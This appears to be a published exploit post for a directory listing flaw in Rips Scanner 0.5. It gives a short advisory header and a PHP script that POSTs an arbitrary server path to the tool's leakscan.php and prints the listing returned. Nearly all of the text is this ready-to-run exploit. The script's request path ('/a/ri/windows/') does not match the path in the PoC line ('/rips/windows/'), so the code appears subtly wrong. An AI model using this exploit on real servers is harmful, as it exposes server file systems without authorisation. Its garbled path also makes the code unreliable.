Rips Scanner 0.5 Directory Listing
Posted on 25 December 2015
<?php # Title : Rips Scanner 0.5 - (leakscan.php) Directory Listing # Vendor Homepage: https://github.com/robocoder/rips-scanner # Date: 24/12/2015 # Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip # Version : 0.5 # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/rips-leakscan.txt # Vulnerable File : leakscan.php # PoC : # http://127.0.1.1/rips/windows/leakscan.php # POST : loc=/var/www/html # PHP Exploit : # exploit.php http://localhost/rips /var/www/html $target = $argv[1]; $path = $argv[2]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "$target/a/ri/windows/leakscan.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "loc=$path"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "ni"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?>
